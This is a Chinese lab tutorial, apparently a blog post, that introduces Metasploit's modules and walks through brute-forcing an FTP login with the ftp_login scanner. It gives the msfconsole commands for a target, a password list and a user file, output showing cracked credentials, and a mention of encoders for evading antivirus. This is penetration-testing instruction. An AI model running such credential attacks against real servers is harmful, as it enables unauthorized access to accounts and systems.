kali下-MSF-ftp_login模块破解FTP账号及密码

news2024/11/17 9:56:45

一、环境准备

两台设备在同一个网络内

一台kali系统:192.168.10.128

一台winserver2016:192.168.10.132

二、MSF介绍

metasploit 全称是The Metasploit Framework,又称MSF,是Kali 内置的一款渗透测试框架,也是全球最受欢迎的渗透测试工具之一。

MSF允许使用者开发自己的漏洞脚本,从而进行测试,它还可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,提供真正的安全风险情报等。

分为专业版和免费版,下载官网:https://www.metasploit.com/

MSF框架由多个模块组成,各个模块之间的功能如下:

1、auxiliary(辅助模块)该模块不会直接在测试者和目标主机之间建立访问,他们只会负责执行扫描、嗅探、指纹识别等相关功能以辅助渗透测试

2、Exploit(漏洞利用模块)包括针对系统中的漏洞而设计的各种POC验证程序,用于破坏系统安全性的攻击代码

3、Payload(攻击模块)用于在目标系统上运行任意命令或者执行特定代码,在metasploit中可以自由地选择、传送和植入

4、Post(后期渗透模块)主要用于在取得目标系统远程控制权后,进行一系列地后渗透攻击动作,如获取敏感信息、实施跳板攻击等。

5、Encoders(编码工具模块)负责免杀
渗透攻击步骤:
1、扫描目标系统,寻找可用漏洞
2、选择并配置一个漏洞利用模块3、选择并配置一个攻击载荷模块
4、选择一个编码技术,用来绕过杀软5、攻击渗透

三、使用ftp_login模块破解FTP密码

┌──(root㉿kali)-[~]
└─# msfconsole   进入框架
msf6 > search ftp_login #搜索框架
msf6 > use 0   #使用框架
#设置目标主机
msf6 auxiliary(scanner/ftp/ftp_login) > set rhosts 192.168.10.132
#使用密码字典文件
msf6 auxiliary(scanner/ftp/ftp_login) > set pass_file /root/pass.txt
#关闭信任凭据
msf6 auxiliary(scanner/ftp/ftp_login) > set stop_on_success true
#设置登录的用户,可以是文件
msf6 auxiliary(scanner/ftp/ftp_login) > set username zhangsan
msf6 auxiliary(scanner/ftp/ftp_login) > set user_file  /root/user.txt
#攻击
msf6 auxiliary(scanner/ftp/ftp_login) > exploit
[*] 192.168.10.132:21     - 192.168.10.132:21 - Starting FTP login sweep
[+] 192.168.10.132:21     - 192.168.10.132:21 - Login Successful: zhangsan:admin.123
[*] 192.168.10.132:21     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1396820.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Docker(二)安装指南:主要介绍在 Linux 、Windows 10 和 macOS 上的安装

作者主页: 正函数的个人主页 文章收录专栏: Docker 欢迎大家点赞 👍 收藏 ⭐ 加关注哦! 安装 Docker Docker 分为 stable test 和 nightly 三个更新频道。 官方网站上有各种环境下的 安装指南,这里主要介绍 Docker 在…

【网络技术】【traceroute】【Linux虚拟机(Ubuntu)】无法traceroute至谷歌【及解决方法】

一、问题描述 问题描述如下: Ubuntu虚拟机可以ping通谷歌(www.google.com),但是却无法通过traceroute命令找到路由路线,如下图所示: 二、解决方法 从traceroute命令的返回内容可以看出,路由寻…

使用IEEE754标准转换过程

IEEE 754标准是一种用于浮点数表示和计算的标准。对于给定的浮点数,IEEE 754标准定义了如何表示它以及如何执行基本的算术运算。 例如,现在要将十进制浮点数3.25f转换为IEEE 754标准的二进制表示,可以按照以下步骤进行: 将3.25f…

网卡:初始化,frame组装,网卡处理电信号过程

ip模块中存储的是一堆数字信号,网卡内部会把数字信号转换成电信号或者光信号在网线中传输。 网卡只是一个硬件,需要驱动程序去操作他,计算机中已经把主流网卡的驱动程序(不只是网卡的,还有鼠标,键盘这些硬件…

性能测试知多少---性能测试流程

看到好多新手,在性能需求模糊的情况下,随便找一个性能测试工具,然后就开始进行性能测试了,在这种情况下得到的性能测试结果很难体现系统真实的能力,或者可能与系统真实的性能相距甚远。 与功能测试相比,性能…

R.swift SwiftGen 资源使用指南

R.swift 和 SwiftGen 资源转换使用指南 R.swift (原始代码会打包到项目?) Pod platform :ios, 12.0 target LBtest do# Comment the next line if you dont want to use dynamic frameworksuse_frameworks!pod R.swift # pod SwiftGen, ~&g…

虚幻UE 特效-Niagara特效实战-雨天

回顾Niagara特效基础知识:虚幻UE 特效-Niagara特效初识 其他两篇实战:虚幻UE 特效-Niagara特效实战-火焰、烛火、虚幻UE 特效-Niagara特效实战-烟雾、喷泉 本篇笔记我们再来实战雨天,雨天主要用到了特效中的事件。 文章目录 一、雨天1、创建雨…

智汇云舟创始人兼总裁周舟:视频孪生赋能智慧城市多元场景建设

1月18日,由知名科技媒体和产业智库泰伯网主办的WIF2023创新先行者论坛暨企业家会员年会于北京成功举办。共有百余位科技公司创始人、管理者、投资人齐聚,研判产业经济趋势,寻找新形势下企业未来发展的新方向、新机会。智汇云舟创始人兼总裁周…

毅速ESU:金属3D打印技术助力模具开发降本增效

模具是工业之母,在高效批产方面极具优势,但随着企业对模具精度、结构复杂性、生产周期和成本的要求日益严格,传统模具制造已经不能完全满足市场需求。在众多的模具加工工艺新技术中,3D打印技术把增材制造理念引入模具行业&#xf…

精品量化公式——“筹码动态”,筹码动态改进版,增加了三个买点信号标识

不多说,直接上效果如图: ► 日线表现 代码评估 技术指标代码评估: 散筹估算: 使用EMA(指数移动平均)方法计算(WINNER(C*1.1)-WINNER(C*0.9))*70的3日均线,用黄色粗线表示。这是用于估算市场中散户投资者的…

在Linux中安装和配置Node.js与Express.js创建HTTP服务器

在Linux环境中,安装和配置Node.js与Express.js来创建一个HTTP服务器需要一系列的步骤。下面是一个详细的指南,帮助你在Linux上设置这个环境。 步骤1:安装Node.js 首先,你需要确保你的Linux系统已经安装了Node.js。你可以通过以下…

Vulnhub靶机:driftingblues 7

一、介绍 运行环境:Virtualbox 攻击机:kali(10.0.2.15) 靶机:driftingblues7(10.0.2.23) 目标:获取靶机root权限和flag 靶机下载地址:https://www.vulnhub.com/entr…

限时免费参加游戏开发训练营!!!

限时免费 本周有效 游戏行业作为当下最火热的行业之一,受到了很多人的喜爱,也有很多同学想要进入游戏开发行业。 基于大家的需求,我们为大家提供了不同类型的游戏开发训练营,让你既能通过这些游戏Demo熟练开发技能,也…

python222网站实战(SpringBoot+SpringSecurity+MybatisPlus+thymeleaf+layui)-热门帖子推荐显示实现

锋哥原创的SpringbootLayui python222网站实战: python222网站实战课程视频教程(SpringBootPython爬虫实战) ( 火爆连载更新中... )_哔哩哔哩_bilibilipython222网站实战课程视频教程(SpringBootPython爬虫实战) ( 火…

【android】 android 里写jni

目录 (1) 环境准备 (2) 关联c文件到gradle文件 (3) 生成了 (4) 书写 (5) 使用 (6)业务调用 参考文档 (1) 环境准备 ndk, cmake (2) 关联c文件到gr…

算法练习-A+B/财务管理/实现四舍五入/牛牛的菱形字符(题目链接+题解打卡)

难度参考 难度:简单 分类:熟悉OJ与IDE的操作 难度与分类由我所参与的培训课程提供,但需要注意的是,难度与分类仅供参考。以下内容均为个人笔记,旨在督促自己认真学习。 题目 A B1. A B - AcWing题库财务管理1004:财…

【SpringBoot】Bean 是什么?

感兴趣的话,可以看我另外一篇关于 Bean 的文章:【Java基础】Spring 中 Bean 的理解与使用 一、Bean 定义 Bean 作为 Spring 框架面试中不可或缺的概念,其本质上是指代任何被 Spring 加载生成出来的对象。(本质上区别于 Java Bea…

Docker 部署考核

Docker安装 安装必要的系统工具 yum install -y yum-utils device-mapper-persistent-data lvm2 添加docker-ce安装源: yum-config-manager --add-repo https://download.docker.com/linux/centos/docker-ce.repo 配置阿里云Docker Yum源: yum-config-manager --ad…

计算机网络-ACL访问控制列表

上一篇介绍NAT时候就看到了ACL这个东西了,这个是什么意思?有什么作用呢? 一、ACL访问控制列表 访问控制列表 (ACL, Access Control List)是由一系列permit或deny语句组成的、有序规则的列表。ACL是一个匹配工具,能够对报文进行匹配…